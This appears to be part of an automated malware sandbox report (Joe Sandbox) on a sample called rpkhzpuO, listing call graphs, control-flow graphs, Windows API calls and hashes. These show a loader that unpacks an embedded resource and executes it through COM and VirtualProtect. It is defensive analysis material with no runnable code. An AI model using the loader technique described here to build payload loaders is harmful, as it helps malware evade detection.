15518->15523 15521 40eda1 15519->15521 15522 40edb5 15519->15522 15524 40bfc1 __vsnprintf_l 63 API calls 15520->15524 15529 414b9e 15521->15529 15549 414b5c 15522->15549 15523->15514 15527 40ed84 15524->15527 15528 40e744 __vsnprintf_l 6 API calls 15527->15528 15528->15514 15530 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15529->15530 15531 414bb2 15530->15531 15532 414bd3 15531->15532 15533 414c06 15531->15533 15546 414bbb 15531->15546 15534 40bfc1 __vsnprintf_l 63 API calls 15532->15534 15535 414c10 15533->15535 15536 414c2a 15533->15536 15537 414bd8 15534->15537 15538 40bfc1 __vsnprintf_l 63 API calls 15535->15538 15539 414c34 15536->15539 15540 414c49 15536->15540 15541 40e744 __vsnprintf_l 6 API calls 15537->15541 15542 414c15 15538->15542 15554 417c1d 15539->15554 15544 414b5c ___crtCompareStringA 96 API calls 15540->15544 15541->15546 15545 40e744 __vsnprintf_l 6 API calls 15542->15545 15547 414c63 15544->15547 15545->15546 15546->15514 15547->15546 15548 40bfc1 __vsnprintf_l 63 API calls 15547->15548 15548->15546 15550 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15549->15550 15551 414b6f 15550->15551 15570 4147ec 15551->15570 15555 417c33 15554->15555 15564 417c58 ___ascii_strnicmp 15554->15564 15556 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15555->15556 15557 417c3e 15556->15557 15558 417c43 15557->15558 15559 417c78 15557->15559 15560 40bfc1 __vsnprintf_l 63 API calls 15558->15560 15561 417c82 15559->15561 15569 417caa 15559->15569 15562 417c48 15560->15562 15563 40bfc1 __vsnprintf_l 63 API calls 15561->15563 15565 40e744 __vsnprintf_l 6 API calls 15562->15565 15566 417c87 15563->15566 15564->15546 15565->15564 15567 40e744 __vsnprintf_l 6 API calls 15566->15567 15567->15564 15568 4168fc 98 API calls __tolower_l 15568->15569 15569->15564 15569->15568 15571 414818 CompareStringW 15570->15571 15573 41482f strncnt 15570->15573 15572 41483b GetLastError 15571->15572 15571->15573 15572->15573 15575 414a95 15573->15575 15578 4148a4 15573->15578 15597 414881 15573->15597 15574 40ce09 __crtGetStringTypeA_stat 5 API calls 15576 414b5a 15574->15576 15577 417a20 ___ansicp 87 API calls 15575->15577 15576->15514 15579 414abb 15577->15579 15580 414962 MultiByteToWideChar 15578->15580 15584 4148e6 GetCPInfo 15578->15584 15578->15597 15581 414b1c CompareStringA 15579->15581 15582 417a69 ___convertcp 70 API calls 15579->15582 15579->15597 15588 414982 15580->15588 15580->15597 15583 414b3a 15581->15583 15581->15597 15585 414ae0 15582->15585 15586 40b6b5 __crtGetStringTypeA_stat 63 API calls 15583->15586 15587 4148f7 15584->15587 15584->15597 15592 417a69 ___convertcp 70 API calls 15585->15592 15585->15597 15589 414b40 15586->15589 15587->15580 15587->15597 15593 40b84d _malloc 63 API calls 15588->15593 15601 41499f __crtGetStringTypeA_stat 15588->15601 15594 40b6b5 __crtGetStringTypeA_stat 63 API calls 15589->15594 15590 4149d9 MultiByteToWideChar 15591 4149f2 MultiByteToWideChar 15590->15591 15609 414a83 15590->15609 15598 414a09 15591->15598 15591->15609 15595 414b01 15592->15595 15593->15601 15594->15597 15599 414b16 15595->15599 15600 414b0a 15595->15600 15596 4147ae __freea 63 API calls 15596->15597 15597->15574 15606 414a1f __crtGetStringTypeA_stat 15598->15606 15607 40b84d _malloc 63 API calls 15598->15607 15599->15581 15602 40b6b5 __crtGetStringTypeA_stat 63 API calls 15600->15602 15601->15590 15601->15597 15602->15597 15603 414a53 MultiByteToWideChar 15604 414a66 CompareStringW 15603->15604 15605 414a7d 15603->15605 15604->15605 15608 4147ae __freea 63 API calls 15605->15608 15606->15603 15606->15609 15607->15606 15608->15609 15609->15596 15610->15405 15617 40d0f5 15611->15617 15614 40cd39 15615 40cd6e RaiseException 15614->15615 15616 40cd62 15614->15616 15615->15366 15616->15615 15618 40af59 15617->15618 15619 40d115 _strlen 15617->15619 15618->15614 15619->15618 15620 40b84d _malloc 63 API calls 15619->15620 15621 40d128 15620->15621 15621->15618 15622 40ef42 _strcpy_s 63 API calls 15621->15622 15622->15618 15624 4017f3 15623->15624 15625 4017e9 EntryPoint 15623->15625 15626 401805 15624->15626 15627 4017fb EntryPoint 15624->15627 15625->15624 15628 401818 15626->15628 15629 40180e EntryPoint 15626->15629 15627->15626 15630 40183e 15628->15630 15633 40b783 __recalloc 73 API calls 15628->15633 15637 401844 15628->15637 15629->15628 15631 40b6b5 __crtGetStringTypeA_stat 63 API calls 15630->15631 15631->15637 15634 40182d 15633->15634 15634->15637 15638 401834 EntryPoint 15634->15638 15635 40186d MultiByteToWideChar 15635->15372 15635->15373 15636 40184e EntryPoint 15636->15637 15637->15635 15637->15636 15641 40b743 15637->15641 15638->15630 15640 401044 EntryPoint 15639->15640 15642 40e231 __calloc_impl 63 API calls 15641->15642 15643 40b75d 15642->15643 15644 40b779 15643->15644 15645 40bfc1 __vsnprintf_l 63 API calls 15643->15645 15644->15637 15646 40b770 15645->15646 15646->15644 15647 40bfc1 __vsnprintf_l 63 API calls 15646->15647 15647->15644 15649 40b6b5 __ioinit 15648->15649 15650 40b73d __ioinit 15649->15650 15651 40b714 HeapFree 15649->15651 15650->15387 15651->15650 15652 40b727 15651->15652 15653 40bfc1 __vsnprintf_l 63 API calls 15652->15653 15653->15650 15655 40aff8 15654->15655 15656 40b027 15655->15656 15657 40b01f __VEC_memcpy 15655->15657 15656->15396 15657->15656 15659 40e8ea __ioinit 15658->15659 15660 40d6e0 __lock 63 API calls 15659->15660 15661 40e8f1 15660->15661 15662 40e9ba __initterm 15661->15662 15663 40e91d 15661->15663 15677 40e9f5 15662->15677 15665 4104e9 __decode_pointer 6 API calls 15663->15665 15667 40e928 15665->15667 15669 40e9aa __initterm 15667->15669 15671 4104e9 __decode_pointer 6 API calls 15667->15671 15668 40e9f2 __ioinit 15668->14434 15669->15662 15676 40e93d 15671->15676 15672 40e9e9 15673 40e7ee __mtinitlocknum 4 API calls 15672->15673 15673->15668 15674 4104e9 6 API calls __decode_pointer 15674->15676 15675 4104e0 6 API calls _doexit 15675->15676 15676->15669 15676->15674 15676->15675 15678 40e9d6 15677->15678 15679 40e9fb 15677->15679 15678->15668 15681 40d606 LeaveCriticalSection 15678->15681 15682 40d606 LeaveCriticalSection 15679->15682 15681->15672 15682->15678

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 34 401cd0-401cd4 24->34 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 35 401cf0-401cf2 34->35 36 401cd6-401cd8 34->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->34 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 78 401da0-401da2 76->78 79 401d86-401d88 76->79 84 401da5-401da7 78->84 82 401d8a-401d90 79->82 83 401d9c-401d9e 79->83 82->78 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->83 87->7 87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 2562d006 122->154 155 40234e call 2562d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 2562d006 135->152 153 402390 call 2562d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                                              APIs
                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                              • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                              • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401DC4
                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                              • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                              • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                              • _memset.LIBCMT ref: 00401EDD
                                                                                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2099220238.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2099220238.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                              • API String ID: 1430744539-2962942730
                                                                                                                                              • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                              • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                              • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3322701435-0
                                                                                                                                              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                              • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                              • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                              APIs
                                                                                                                                              • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1411284514-0
                                                                                                                                              • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                              • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                              • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                              • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                              APIs
                                                                                                                                              • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                                • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                                • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                                • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2427264223-0
                                                                                                                                              • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                              • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                              • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                              • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 303 25689130-256891b1 VirtualProtect 306 256891ba-256891df 303->306 307 256891b3-256891b9 303->307 307->306
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 256891A4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2129805657.0000000025680000.00000040.00000800.00020000.00000000.sdmp, Offset: 25680000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_25680000_rpkhzpuO.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: a9b71ff10413bed3b54ca1decc8fdc11fa710264e1dbca5bc2c2560e3c729a8c
                                                                                                                                              • Instruction ID: e73a466bcd9447728e3e571373b3a68b6f60b2704067a08948c6a2844845c0c1
                                                                                                                                              • Opcode Fuzzy Hash: a9b71ff10413bed3b54ca1decc8fdc11fa710264e1dbca5bc2c2560e3c729a8c
                                                                                                                                              • Instruction Fuzzy Hash: 851108B1D042499FDB10DFAAC844AEEFBF5FF48320F10841AD519A7250C779A944CFA1
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                              • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocString_malloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 959018026-0
                                                                                                                                              • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                              • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                              • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                              • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                              APIs
                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                              • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                              • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                              • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                              • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                              APIs
                                                                                                                                              • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1597249276-0
                                                                                                                                              • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                              • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                              • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                              • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 329 25689308-25689377 CloseHandle 332 25689379-2568937f 329->332 333 25689380-256893a5 329->333 332->333
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2129805657.0000000025680000.00000040.00000800.00020000.00000000.sdmp, Offset: 25680000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_25680000_rpkhzpuO.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                              • Opcode ID: 648d9455893df3dddc1d94a4f67ed8aa0bec41db333da5b1275cdf28e653e974
                                                                                                                                              • Instruction ID: 6bdc8ad3e4fb5c0789fb2cf848892db4ee45fb37e117cbb0282bafa74f28bf2b
                                                                                                                                              • Opcode Fuzzy Hash: 648d9455893df3dddc1d94a4f67ed8aa0bec41db333da5b1275cdf28e653e974
                                                                                                                                              • Instruction Fuzzy Hash: A9113AB1D002488FCB10DFAAC8457EEFBF4EF88720F208419D51AA7240CB78A944CBA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b815015341f704da126aada94dce146748744be78ca3e3a9e05843d38e45732
                                                                                                                                              • Instruction ID: 4ac2418a9e42a3ecc8570debf5a2f4ebea83dfb977919fb77aaa042de525b6ad
                                                                                                                                              • Opcode Fuzzy Hash: 5b815015341f704da126aada94dce146748744be78ca3e3a9e05843d38e45732
                                                                                                                                              • Instruction Fuzzy Hash: B42103B1504644DFDB05DF14D9C0F16BFB6FB88310F20C56AE9088A256C33AE896CAA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 31407185e024de6789f5f8b9b880fbb1de52c9ed10225ef284649a16fc43e2d3
                                                                                                                                              • Instruction ID: 9120cad7ce22fc31e11b0f9279b7981ca0001e26db45d9214922d9fc97cd96ae
                                                                                                                                              • Opcode Fuzzy Hash: 31407185e024de6789f5f8b9b880fbb1de52c9ed10225ef284649a16fc43e2d3
                                                                                                                                              • Instruction Fuzzy Hash: 8F210372504644DFCB05DF14D9C0F0ABFB6FB98314F20C56AE9088B256C33AE856CAE2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
                                                                                                                                              • Instruction ID: 698dd444362185bc2fb22aa77ca71cf54b7b089469f2b0b025ad2394d596315b
                                                                                                                                              • Opcode Fuzzy Hash: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
                                                                                                                                              • Instruction Fuzzy Hash: D9119D76504680CFCB02CF10D5C4B06BF72FB88314F24C5AAD9494A656C336E55ACBA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd
